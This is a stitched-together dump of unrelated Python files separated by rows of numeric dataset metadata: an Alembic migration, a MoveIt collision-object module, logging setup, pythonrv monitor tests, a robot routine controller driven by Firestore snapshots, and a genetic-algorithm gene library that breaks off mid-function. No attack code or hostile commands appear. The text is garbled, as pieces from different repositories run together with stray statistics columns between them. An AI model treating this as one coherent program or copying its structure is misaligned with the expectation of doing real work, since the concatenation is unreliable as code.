sa.Column('name', sa.String(), nullable=True),
sa.Column('startTime', sa.DateTime(), nullable=False),
sa.Column('category', sa.String(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('Venues',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('city', sa.String(length=120), nullable=False),
sa.Column('state', sa.String(length=120), nullable=False),
sa.Column('address', sa.String(length=120), nullable=False),
sa.Column('phone', sa.String(length=120), nullable=True),
sa.Column('image_link', sa.String(length=500), nullable=True),
sa.Column('facebook_link', sa.String(length=120), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.drop_table('venues')
op.drop_table('artists')
op.drop_table('shows')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('shows',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column('startTime', postgresql.TIMESTAMP(), autoincrement=False, nullable=False),
sa.PrimaryKeyConstraint('id', name='shows_pkey')
)
op.create_table('artists',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False),
sa.Column('city', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.Column('state', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.Column('phone', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.Column('genres', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.Column('image_link', sa.VARCHAR(length=500), autoincrement=False, nullable=False),
sa.Column('facebook_link', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.PrimaryKeyConstraint('id', name='artists_pkey')
)
op.create_table('venues',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False),
sa.Column('city', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.Column('state', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.Column('address', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.Column('phone', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.Column('image_link', sa.VARCHAR(length=500), autoincrement=False, nullable=False),
sa.Column('facebook_link', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
sa.PrimaryKeyConstraint('id', name='venues_pkey')
)
op.drop_table('Venues')
op.drop_table('Shows')
op.drop_table('Artists')
# ### end Alembic commands ###
| 44.101124
| 92
| 0.694777
| 502
| 3,925
| 5.380478
| 0.14741
| 0.112551
| 0.188819
| 0.225472
| 0.81007
| 0.807108
| 0.797482
| 0.771196
| 0.708997
| 0.611996
| 0
| 0.03631
| 0.129936
| 3,925
| 88
| 93
| 44.602273
| 0.754612
| 0.075159
| 0
| 0.380282
| 0
| 0
| 0.103813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0
| 0.042254
| 0
| 0.070423
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
69bf2788e42be7d1c935d4f908e3fe3d6e71ce92
| 16,096
|
py
|
Python
|
panda_autograsp/src/panda_autograsp/moveit_collision_objects.py
|
rickstaa/panda-autograsp
|
bfa1952ad8d0be86b554d8afdddd6aaa6d22040c
|
[
"MIT"
] | 7
|
2020-12-02T04:09:35.000Z
|
2022-03-11T06:24:49.000Z
|
panda_autograsp/src/panda_autograsp/moveit_collision_objects.py
|
rickstaa/panda_autograsp
|
bfa1952ad8d0be86b554d8afdddd6aaa6d22040c
|
[
"MIT"
] | 84
|
2019-07-04T20:49:46.000Z
|
2020-11-24T12:08:46.000Z
|
panda_autograsp/src/panda_autograsp/moveit_collision_objects.py
|
rickstaa/panda_autograsp
|
bfa1952ad8d0be86b554d8afdddd6aaa6d22040c
|
[
"MIT"
] | 2
|
2020-11-25T14:38:58.000Z
|
2022-01-24T15:41:32.000Z
|
"""Module that contains a number of constraint object classes
that can be used to add constraint to the moveit planning
scene. It was created since the moveit_commander doesn't yet
contain a addCollisionObjects method. As a result using the
standard collision_object_msgs and shape_msgs was not ideal."""
# ROS messages and services
from geometry_msgs.msg import PoseStamped
#################################################
# Constraint classes ############################
#################################################
class Box(object):
"""Moveit Box collision object class.
Attributes
------------
type : :py:obj:`str`
Collision object type.
name : :py:obj:`str`
The name of the object.
size : :py:obj:`tuple`
The size of the box specified as (x, y, z).
pose : :py:obj:`!geometry_msgs.PoseStamed`
The pose of the collision object.
"""
def __init__(
self,
name,
size_x=1.0,
size_y=1.0,
size_z=1.0,
x_pos=0.0,
y_pos=0.0,
z_pos=0.0,
x_rot=0.0,
y_rot=0.0,
z_rot=0.0,
w_rot=1.0,
reference_frame="world",
):
"""
Parameters
----------
name : :py:obj:`str`
The name of the object.
size_x : :py:obj:`float`, optional
The x-dimensions size of the box, by default 1.0
size_y : :py:obj:`float`, optional
The y-dimensions size of the box, by default 1.0
size_z : :py:obj:`float`, optional
The z-dimensions size of the box, by default 1.0
x_pos : :py:obj:`float`, optional
The x position in link_name frame, by default 0.0.
y_pos : :py:obj:`float`, optional
The y position in link_name frame, by default 0.0.
z_pos : :py:obj:`float`, optional
The z position in link_name frame, by default 0.0.
x_rot : :py:obj:`float`, optional
The x orientation relative to the link_name frame, by default 0.0.
y_rot : :py:obj:`float`, optional
The y orientation relative to the link_name frame, by default 0.0.
z_rot : :py:obj:`float`, optional
The z orientation relative to the link_name frame, by default 0.0.
w_rot : :py:obj:`float`, optional
The w orientation relative to the link_name frame, by default 1.0.
reference_frame : :py:obj:`str`, optional
The frame in which the pose is expressed, by default world.
"""
# Set member variables
self.type = "box"
self.name = name
self.pose = PoseStamped()
self.pose.header.frame_id = reference_frame
self.pose.pose.position.x = x_pos
self.pose.pose.position.y = y_pos
self.pose.pose.position.z = z_pos
self.pose.pose.orientation.x = x_rot
self.pose.pose.orientation.y = y_rot
self.pose.pose.orientation.z = z_rot
self.pose.pose.orientation.w = w_rot
self._size = (size_y, size_y, size_z)
@property
def size(self):
"""Get the size of the collision object."""
return self._size
@size.setter
def size(self, value):
if not isinstance(value, tuple) or len(value) != 3: # Validate if tuple
raise Exception("Size should be a tuple of length 3 (x, y, z).")
self._size = value
class Plane(object):
"""Moveit Cube collision object class.
.. note::
This class uses the plane equation Ax+Bx+Cz + D = 0
to construct the plane. In this A,B,C represent the
the coordinates of the plane normal (Orientation) and
D the offset to the normal.
Attributes
------------
type : :py:obj:`str`
Collision object type.
name : :py:obj:`str`
The name of the object.
normal : :py:obj:`list`
Plane normal specified as (x, y, z).
offset : :py:obj:`float`
Plane offset relative to the normal.
pose : :py:obj:`!geometry_msgs.PoseStamed`
The pose of the collision object.
"""
def __init__(
self,
name,
normal_x=0.0,
normal_y=0.0,
normal_z=1.0,
offset=0.0,
x_pos=0.0,
y_pos=0.0,
z_pos=0.0,
x_rot=0.0,
y_rot=0.0,
z_rot=0.0,
w_rot=1.0,
reference_frame="world",
):
"""
Parameters
----------
name : :py:obj:`str`
The name of the object.
normal_x : :py:obj:`float`, optional
The normal vector x coordinate, by default 0.0.
normal_y : :py:obj:`float`, optional
The normal vector y coordinate, by default 0.0.
normal_z : :py:obj:`float`, optional
The normal vector z coordinate, by default 1.0.
offset : py:obj:`float`, optional
Plane offset relative to the normal, by default 0.0
x_pos : :py:obj:`float`, optional
The x position in link_name frame, by default 0.0.
y_pos : :py:obj:`float`, optional
The y position in link_name frame, by default 0.0.
z_pos : :py:obj:`float`, optional
The z position in link_name frame, by default 0.0.
x_rot : :py:obj:`float`, optional
The x orientation relative to the link_name frame, by default 0.0.
y_rot : :py:obj:`float`, optional
The y orientation relative to the link_name frame, by default 0.0.
z_rot : :py:obj:`float`, optional
The z orientation relative to the link_name frame, by default 0.0.
w_rot : :py:obj:`float`, optional
The w orientation relative to the link_name frame, by default 1.0.
reference_frame : :py:obj:`str`, optional
The frame in which the pose is expressed, by default world.
"""
# Set member variables
self.type = "plane"
self.name = name
self.offset = offset
self.reference_frame = reference_frame
normal_tmp = (float(normal_x), float(normal_y), float(normal_z))
self._normal = tuple(
ti / sum(normal_tmp) for ti in normal_tmp
) # Normalize tuple
self.pose = PoseStamped()
self.pose.header.frame_id = reference_frame
self.pose.pose.position.x = x_pos
self.pose.pose.position.y = y_pos
self.pose.pose.position.z = z_pos
self.pose.pose.orientation.x = x_rot
self.pose.pose.orientation.y = y_rot
self.pose.pose.orientation.z = z_rot
self.pose.pose.orientation.w = w_rot
@property
def normal(self):
"""The plane normal."""
return self._normal
@normal.setter
def normal(self, value):
if not isinstance(value, tuple) or len(value) != 3: # Validate if tuple
raise Exception("Size should be a tuple of length 3 (x, y, z).")
normal_tmp = tuple(float(ti) for ti in value) # Create float
self._normal = tuple(
ti / sum(normal_tmp) for ti in normal_tmp
) # Normalize tuple
class Cylinder(object):
"""Moveit cylinder collision object class.
Attributes
------------
type : :py:obj:`str`
Collision object type.
name : :py:obj:`str`
The name of the object.
height : :py:obj:`float`
The height of the cylinder.
radius : :py:obj:`float`
The radius of the cylinder.
x_pos : :py:obj:`float`
The x position in link_name frame.
y_pos : :py:obj:`float`
The y position in link_name frame.
z_pos : :py:obj:`float`
The z position in link_name frame.
x_rot : :py:obj:`float`
The x orientation relative to the link_name frame.
y_rot : :py:obj:`float`
The y orientation relative to the link_name frame.
z_rot : :py:obj:`float`
The z orientation relative to the link_name frame.
w_rot : :py:obj:`float`
The w orientation relative to the link_name frame.
pose : :py:obj:`!geometry_msgs.PoseStamped`
The object pose.
"""
def __init__(
self,
name,
height=1.0,
radius=1.0,
x_pos=0.0,
y_pos=0.0,
z_pos=0.0,
x_rot=0.0,
y_rot=0.0,
z_rot=0.0,
w_rot=1.0,
reference_frame="world",
):
"""
Parameters
----------
name : :py:obj:`str`
The name of the object.
height : :py:obj:`float`, optional
The height of the cylinder, by default 1.0
radius : :py:obj:`float`, optional
The radius of the cylinder, by default 1.0.
x_pos : :py:obj:`float`, optional
The x position in link_name frame, by default 0.0.
y_pos : :py:obj:`float`, optional
The y position in link_name frame, by default 0.0.
z_pos : :py:obj:`float`, optional
The z position in link_name frame, by default 0.0.
x_rot : :py:obj:`float`, optional
The x orientation relative to the link_name frame, by default 0.0.
y_rot : :py:obj:`float`, optional
The y orientation relative to the link_name frame, by default 0.0.
z_rot : :py:obj:`float`, optional
The z orientation relative to the link_name frame, by default 0.0.
w_rot : :py:obj:`float`, optional
The w orientation relative to the link_name frame, by default 1.0.
reference_frame : :py:obj:`str`, optional
The frame in which the pose is expressed, by default world.
"""
# Set member variables
self.type = "cylinder"
self.name = name
self.height = height
self.radius = radius
self.pose = PoseStamped()
self.pose.header.frame_id = reference_frame
self.pose.pose.position.x = x_pos
self.pose.pose.position.y = y_pos
self.pose.pose.position.z = z_pos
self.pose.pose.orientation.x = x_rot
self.pose.pose.orientation.y = y_rot
self.pose.pose.orientation.z = z_rot
self.pose.pose.orientation.w = w_rot
class Sphere(object):
"""Moveit sphere collision object class.
Attributes
------------
type : :py:obj:`str`
Collision object type.
name : :py:obj:`str`
The name of the object.
radius : :py:obj:`float`
The radius of the sphere.
x_pos : :py:obj:`float`
The x position in link_name frame.
y_pos : :py:obj:`float`
The y position in link_name frame.
z_pos : :py:obj:`float`
The z position in link_name frame.
x_rot : :py:obj:`float`
The x orientation relative to the link_name frame.
y_rot : :py:obj:`float`
The y orientation relative to the link_name frame.
z_rot : :py:obj:`float`
The z orientation relative to the link_name frame.
w_rot : :py:obj:`float`
The w orientation relative to the link_name frame.
pose : :py:obj:`!geometry_msgs.PoseStamped`
The object pose.
"""
def __init__(
self,
name,
radius=1.0,
x_pos=0.0,
y_pos=0.0,
z_pos=0.0,
x_rot=0.0,
y_rot=0.0,
z_rot=0.0,
w_rot=1.0,
reference_frame="world",
):
"""
Parameters
----------
name : :py:obj:`str`
The name of the object.
radius : :py:obj:`float`, optional
The radius of the sphere, by default 1.0.
x_pos : :py:obj:`float`, optional
The x position in link_name frame, by default 0.0.
y_pos : :py:obj:`float`, optional
The y position in link_name frame, by default 0.0.
z_pos : :py:obj:`float`, optional
The z position in link_name frame, by default 0.0.
x_rot : :py:obj:`float`, optional
The x orientation relative to the link_name frame, by default 0.0.
y_rot : :py:obj:`float`, optional
The y orientation relative to the link_name frame, by default 0.0.
z_rot : :py:obj:`float`, optional
The z orientation relative to the link_name frame, by default 0.0.
w_rot : :py:obj:`float`, optional
The w orientation relative to the link_name frame, by default 1.0.
reference_frame : :py:obj:`str`, optional
The frame in which the pose is expressed, by default world.
"""
# Set member variables
self.type = "sphere"
self.name = name
self.radius = radius
self.pose = PoseStamped()
self.pose.header.frame_id = reference_frame
self.pose.pose.position.x = x_pos
self.pose.pose.position.y = y_pos
self.pose.pose.position.z = z_pos
self.pose.pose.orientation.x = x_rot
self.pose.pose.orientation.y = y_rot
self.pose.pose.orientation.z = z_rot
self.pose.pose.orientation.w = w_rot
class Mesh(object):
"""Moveit mesh collision object class.
Attributes
------------
type : :py:obj:`str`
Collision object type.
name : :py:obj:`str`
The name of the object.
file_name : :py:obj:`str`
The location of the mesh file.
x_pos : :py:obj:`float`
The x position in link_name frame.
y_pos : :py:obj:`float`
The y position in link_name frame.
z_pos : :py:obj:`float`
The z position in link_name frame.
x_rot : :py:obj:`float`
The x orientation relative to the link_name frame.
y_rot : :py:obj:`float`
The y orientation relative to the link_name frame.
z_rot : :py:obj:`float`
The z orientation relative to the link_name frame.
w_rot : :py:obj:`float`
The w orientation relative to the link_name frame.
pose : :py:obj:`!geometry_msgs.PoseStamped`
The object pose.
"""
def __init__(
self,
name,
file_name,
x_pos=0.0,
y_pos=0.0,
z_pos=0.0,
x_rot=0.0,
y_rot=0.0,
z_rot=0.0,
w_rot=1.0,
reference_frame="world",
):
"""
Parameters
----------
name : :py:obj:`str`
The name of the object
file_name : :py:obj:`str`
The location of the mesh file.
x_pos : :py:obj:`float`, optional
The x position in link_name frame, by default 0.0.
y_pos : :py:obj:`float`, optional
The y position in link_name frame, by default 0.0.
z_pos : :py:obj:`float`, optional
The z position in link_name frame, by default 0.0.
x_rot : :py:obj:`float`, optional
The x orientation relative to the link_name frame, by default 0.0.
y_rot : :py:obj:`float`, optional
The y orientation relative to the link_name frame, by default 0.0.
z_rot : :py:obj:`float`, optional
The z orientation relative to the link_name frame, by default 0.0.
w_rot : :py:obj:`float`, optional
The w orientation relative to the link_name frame, by default 1.0.
reference_frame : :py:obj:`str`, optional
The frame in which the pose is expressed, by default world.
"""
# Set member variables
self.type = "mesh"
self.name = name
self.file_name = file_name
self.pose = PoseStamped()
self.pose.header.frame_id = reference_frame
self.pose.pose.position.x = x_pos
self.pose.pose.position.y = y_pos
self.pose.pose.position.z = z_pos
self.pose.pose.orientation.x = x_rot
self.pose.pose.orientation.y = y_rot
self.pose.pose.orientation.z = z_rot
self.pose.pose.orientation.w = w_rot
| 35.144105
| 80
| 0.56542
| 2,280
| 16,096
| 3.873684
| 0.061842
| 0.056046
| 0.079257
| 0.091712
| 0.860734
| 0.849751
| 0.828691
| 0.813859
| 0.808877
| 0.799592
| 0
| 0.017048
| 0.325795
| 16,096
| 457
| 81
| 35.221007
| 0.796812
| 0.589587
| 0
| 0.765432
| 0
| 0
| 0.028525
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.006173
| 0
| 0.104938
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38534448b4d7b87c66793340efb46ae589b91907
| 174
|
py
|
Python
|
zmon_worker_monitor/zmon_worker/tasks/__init__.py
|
heroldus/zmon-worker
|
458f8bacb5a00f7fd93d59db406a2c80870519d1
|
[
"Apache-2.0"
] | 17
|
2016-06-03T14:59:21.000Z
|
2020-11-06T13:12:18.000Z
|
zmon_worker_monitor/zmon_worker/tasks/__init__.py
|
heroldus/zmon-worker
|
458f8bacb5a00f7fd93d59db406a2c80870519d1
|
[
"Apache-2.0"
] | 394
|
2016-06-03T14:47:37.000Z
|
2020-04-21T09:31:23.000Z
|
zmon_worker_monitor/zmon_worker/tasks/__init__.py
|
heroldus/zmon-worker
|
458f8bacb5a00f7fd93d59db406a2c80870519d1
|
[
"Apache-2.0"
] | 55
|
2016-08-15T12:42:28.000Z
|
2021-04-06T10:49:35.000Z
|
import logging
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
| 34.8
| 87
| 0.844828
| 18
| 174
| 8.166667
| 0.5
| 0.217687
| 0.394558
| 0.489796
| 0.585034
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011834
| 0.028736
| 174
| 4
| 88
| 43.5
| 0.857988
| 0
| 0
| 0
| 0
| 0
| 0.356322
| 0.356322
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3885a34a1591a31409208d336deb563db7ac625e
| 3,124
|
py
|
Python
|
ServerComponent/venv/Lib/site-packages/pythonrv/test/rv_next_test.py
|
CDU55/FakeNews
|
707bd48dd78851081d98ad21bbdadfc2720bd644
|
[
"MIT"
] | 2
|
2019-01-06T13:31:10.000Z
|
2020-12-11T04:05:44.000Z
|
pythonrv/test/rv_next_test.py
|
tgwizard/pythonrv
|
e50198cc6d48d8c6c6badbe8a1cd46eb0182839a
|
[
"MIT"
] | 37
|
2020-10-20T08:30:53.000Z
|
2020-12-22T13:15:45.000Z
|
pythonrv/test/rv_next_test.py
|
tgwizard/pythonrv
|
e50198cc6d48d8c6c6badbe8a1cd46eb0182839a
|
[
"MIT"
] | 1
|
2020-10-19T14:55:23.000Z
|
2020-10-19T14:55:23.000Z
|
# -*- coding: utf-8 -*-
import unittest
from pythonrv import rv
class TestEventNext(unittest.TestCase):
def test_event_next_called_should_be(self):
class M(object):
def m(self):
pass
@rv.monitor(m=M.m)
def spec(event):
event.next_called_should_be(event.fn.m)
a = M()
a.m()
a.m()
a.m()
def test_event_next_called_should_be_more(self):
class M(object):
def m(self):
pass
def n(self):
pass
@rv.monitor(m=M.m, n=M.n)
def spec(event):
event.next_called_should_be(event.fn.m)
a = M()
a.n()
a.m()
a.m()
with self.assertRaises(AssertionError) as e:
a.n()
self.assertEquals(e.exception.message, "Next function called should have been m")
def test_event_general_next(self):
class M(object):
def m(self):
pass
def n(self):
pass
@rv.monitor(m=M.m, n=M.n)
def spec(event):
event.next(after)
def after(event):
raise AssertionError("turtle power")
a = M()
a.m()
with self.assertRaises(AssertionError) as e:
a.m()
self.assertEquals(e.exception.message, "turtle power")
with self.assertRaises(AssertionError) as e:
a.m()
self.assertEquals(e.exception.message, "turtle power")
with self.assertRaises(AssertionError) as e:
a.m()
self.assertEquals(e.exception.message, "turtle power")
class TestMonitorNext(unittest.TestCase):
def test_monitor_next_simple(self):
class M(object):
def m(self):
pass
def raise_error(event):
raise ValueError("buffy")
@rv.monitor(m=M.m)
def spec(event):
event.fn.m.next(raise_error)
a = M()
a.m()
with self.assertRaises(ValueError) as e:
a.m()
self.assertEquals(e.exception.message, "buffy")
def test_monitor_next_multiple(self):
class M(object):
def m(self):
pass
def n(self):
pass
def raise_error(event):
raise ValueError("buffy")
@rv.monitor(m=M.m)
def spec(event):
event.fn.m.next(raise_error)
a = M()
a.m()
a.n()
a.n()
a.n()
with self.assertRaises(ValueError) as e:
a.m()
self.assertEquals(e.exception.message, "buffy")
def test_monitor_next_args(self):
class M(object):
def m(self):
pass
def raise_error(event, x, y, **kwargs):
raise ValueError(x + y + kwargs.get('z', -1))
@rv.monitor(m=M.m)
def spec(event):
event.fn.m.next(raise_error, (1, 2), dict(z=15))
a = M()
a.m()
with self.assertRaises(ValueError) as e:
a.m()
self.assertEquals(e.exception.message, 18)
| 24.598425
| 89
| 0.510243
| 389
| 3,124
| 4.007712
| 0.156812
| 0.02694
| 0.019243
| 0.020526
| 0.801796
| 0.780629
| 0.778063
| 0.736369
| 0.718409
| 0.710712
| 0
| 0.004061
| 0.369398
| 3,124
| 126
| 90
| 24.793651
| 0.78731
| 0.006722
| 0
| 0.82
| 0
| 0
| 0.034827
| 0
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.25
| false
| 0.09
| 0.02
| 0
| 0.35
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
c7f7a4a7c52dfef05d5b736e266553bf163ab419
| 5,379
|
py
|
Python
|
Robot/lib/commands.py
|
CRIMBOBJR/Auto_Robot
|
500fd25cc0cffabe5ff7ddc8f9d39c0cc340ae9d
|
[
"MIT"
] | null | null | null |
Robot/lib/commands.py
|
CRIMBOBJR/Auto_Robot
|
500fd25cc0cffabe5ff7ddc8f9d39c0cc340ae9d
|
[
"MIT"
] | 1
|
2022-01-22T10:24:05.000Z
|
2022-01-22T10:24:05.000Z
|
Robot/lib/commands.py
|
CRIMBOBJR/Auto_Robot
|
500fd25cc0cffabe5ff7ddc8f9d39c0cc340ae9d
|
[
"MIT"
] | null | null | null |
# This is where we keep all of the functions for the set routines.
from lib.motorCtrl import MotorControl
from time import sleep
class Commands:
def __init__(self, db):
self.db = db
self.motor = MotorControl()
# This is the function that watches the collection of
# datapoints that corresponds to the routine 1 function.
def Routine_1(self):
doc_ref = self.db.collection(u'Command').document(u'routine-1')
doc_watch = doc_ref.on_snapshot(self.r_1_on_snapshot)
# This is the function that will perform routine 1
# based on weather the function above saw a change.
def r_1_on_snapshot(self, dco_snapshot, changes, read_time):
for doc in dco_snapshot:
data = doc.to_dict()
drive = (data['drive'])
for driveDir in drive:
d = driveDir
direction = d['direction']
driveFor = d['driveFor']
if direction == 'N':
self.motor.Forward(driveFor)
elif direction == 'S':
self.motor.Backward(driveFor)
elif direction == 'E':
self.motor.Right(driveFor)
elif direction == 'W':
self.motor.Left(driveFor)
else:
print("nothing here")
print('direction ' + direction + ' | driveFor :' + str(driveFor))
sleep(driveFor)
print(">>>>>END<<<<<")
# This is the function that watches the collection of
# datapoints that corresponds to the rountine 2 function.
def Routine_2(self):
doc_ref = self.db.collection(u'Command').document(u'routine-2')
doc_watch = doc_ref.on_snapshot(self.r_2_on_snapshot)
# This is the function that will perform routine 2
# based on weather the function above saw a change.
def r_2_on_snapshot(self, dco_snapshot, changes, read_time):
for doc in dco_snapshot:
data = doc.to_dict()
drive = (data['drive'])
for driveDir in drive:
d = driveDir
direction = d['direction']
driveFor = d['driveFor']
if direction == 'N':
self.motor.Forward(driveFor)
elif direction == 'S':
self.motor.Backward(driveFor)
elif direction == 'E':
self.motor.Right(driveFor)
elif direction == 'W':
self.motor.Left(driveFor)
else:
print("nothing here")
print('direction ' + direction + ' | driveFor :' + str(driveFor))
sleep(driveFor)
print(">>>>>END<<<<<")
# This is the function that watches the collection of
# datapoints that corresponds to the rountine 3 function.
def Routine_3(self):
doc_ref = self.db.collection(u'Command').document(u'routine-3')
doc_watch = doc_ref.on_snapshot(self.r_3_on_snapshot)
# This is the function that will perform routine 3
# based on weather the function above saw a change.
def r_3_on_snapshot(self, dco_snapshot, changes, read_time):
for doc in dco_snapshot:
data = doc.to_dict()
drive = (data['drive'])
for driveDir in drive:
d = driveDir
direction = d['direction']
driveFor = d['driveFor']
if direction == 'N':
self.motor.Forward(driveFor)
elif direction == 'S':
self.motor.Backward(driveFor)
elif direction == 'E':
self.motor.Right(driveFor)
elif direction == 'W':
self.motor.Left(driveFor)
else:
print("nothing here")
print('direction ' + direction + ' | driveFor :' + str(driveFor))
sleep(driveFor)
print(">>>>>END<<<<<")
# This is the function that watches the collection of
# datapoints that corresponds to the rountine 4 function.
def Routine_4(self):
doc_ref = self.db.collection(u'Command').document(u'routine-4')
doc_watch = doc_ref.on_snapshot(self.r_4_on_snapshot)
# This is the function that will perform routine 4
# based on weather the function above saw a change.
def r_4_on_snapshot(self, dco_snapshot, changes, read_time):
for doc in dco_snapshot:
data = doc.to_dict()
drive = (data['drive'])
for driveDir in drive:
d = driveDir
direction = d['direction']
driveFor = d['driveFor']
if direction == 'N':
self.motor.Forward(driveFor)
elif direction == 'S':
self.motor.Backward(driveFor)
elif direction == 'E':
self.motor.Right(driveFor)
elif direction == 'W':
self.motor.Left(driveFor)
else:
print("nothing here")
print('direction ' + direction + ' | driveFor :' + str(driveFor))
sleep(driveFor)
print(">>>>>END<<<<<")
| 34.044304
| 81
| 0.528351
| 586
| 5,379
| 4.740614
| 0.141638
| 0.055076
| 0.090713
| 0.048956
| 0.905688
| 0.905688
| 0.905688
| 0.905688
| 0.863931
| 0.863931
| 0
| 0.007134
| 0.374605
| 5,379
| 157
| 82
| 34.261147
| 0.818668
| 0.167131
| 0
| 0.784314
| 0
| 0
| 0.080681
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.019608
| 0
| 0.117647
| 0.117647
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a2480483211d039c4091a6c5eceb8f4d652bf5f
| 7,165
|
py
|
Python
|
GeneLibrary.py
|
littley/pyvolution
|
9df7924ba3d62f7be301fe2d4820e6eae0da4947
|
[
"Apache-2.0"
] | 6
|
2018-11-27T10:32:07.000Z
|
2019-09-23T18:30:47.000Z
|
GeneLibrary.py
|
littley/pyvolution
|
9df7924ba3d62f7be301fe2d4820e6eae0da4947
|
[
"Apache-2.0"
] | null | null | null |
GeneLibrary.py
|
littley/pyvolution
|
9df7924ba3d62f7be301fe2d4820e6eae0da4947
|
[
"Apache-2.0"
] | 4
|
2017-05-20T10:11:46.000Z
|
2020-06-03T19:28:36.000Z
|
import random
import sys
from internal.GeneType import *
def FloatGeneType(description,
minVal=None,
maxVal=None,
generatorAverage=None,
generatorSTDEV=1,
averageMutation=0,
mutationSTDEV=1,
mutatorGene=None):
"""
Regurn a GeneType of type float configured as specified
:param description: the description/name of this gene
:type description: str
:param minVal: the minimum value allowed for this gene. Values that end up smaller will be rounded to the minVal
A value of None means that there is no minVal
:type minVal: float
:param maxVal: the maximum value allowed for this gene. Values that end up larger will be rounded to the maxVal
A value of None means that there is no maxVal
:type maxVal: float
:param generatorAverage: the average value that is generated for new genes
A value of None will cause a flat distribution to be used
:type generatorAverage: float
:param generatorSTDEV: the standard devation of the values generated for new genes
:type generatorSTDEV: float
:param averageMutation: the average amount that this gene changes during each mutation. You should have a VERY
good reason to set this to something other than the default value
:type averageMutation: float
:param mutationSTDEV: The standard deviation of the change during mutation.
:type mutationSTDEV: float
:param mutatorGene: the description of a gene. If not None, the value of this gene will be used instead of
the mutationSTDEV. If it is None then it is ignored
:type mutatorGene: str
:rtype: GeneType
"""
if minVal is None:
minVal = -1 * sys.maxint
if maxVal is None:
maxVal = sys.maxint
def generator():
if generatorAverage is None:
return random.uniform(minVal, maxVal)
else:
result = random.normalvariate(generatorAverage, generatorSTDEV)
if maxVal is not None:
result = min(result, maxVal)
if minVal is not None:
result = max(result, minVal)
return result
def mutator(originalValue, chromosome):
stdev = mutationSTDEV
if mutatorGene is not None:
stdev = chromosome[mutatorGene]
result = originalValue + random.normalvariate(averageMutation, stdev)
result = max(min(result, maxVal), minVal)
return result
return GeneType(generator, mutator, description)
##################################################################################################
def IntGeneType(description,
minVal=None,
maxVal=None,
generatorAverage=None,
generatorSTDEV=1,
averageMutation=0,
mutationSTDEV=1,
mutatorGene=None):
"""
Regurn a GeneType of type int configured as specified
:param description: the description/name of this gene
:type description: str
:param minVal: the minimum value allowed for this gene. Values that end up smaller will be rounded to the minVal
A value of None means that there is no minVal
:type minVal: int
:param maxVal: the maximum value allowed for this gene. Values that end up larger will be rounded to the maxVal
A value of None means that there is no maxVal
:type maxVal: int
:param generatorAverage: the average value that is generated for new genes
A value of None will cause a flat distribution to be used
:type generatorAverage: float
:param generatorSTDEV: the standard devation of the values generated for new genes
:type generatorSTDEV: float
:param averageMutation: the average amount that this gene changes during each mutation. You should have a VERY
good reason to set this to something other than the default value
:type averageMutation: float
:param mutationSTDEV: The standard deviation of the change during mutation.
:type mutationSTDEV: float
:param mutatorGene: the description of a gene. If not None, the value of this gene will be used instead of
the mutationSTDEV. If it is None then it is ignored
:type mutatorGene: str
:rtype: GeneType
"""
if minVal is None:
minVal = -1 * sys.maxint
if maxVal is None:
maxVal = sys.maxint
def generator():
if generatorAverage is None:
return int(round(random.uniform(minVal, maxVal)))
else:
result = random.normalvariate(generatorAverage, generatorSTDEV)
if maxVal is not None:
result = min(result, maxVal)
if minVal is not None:
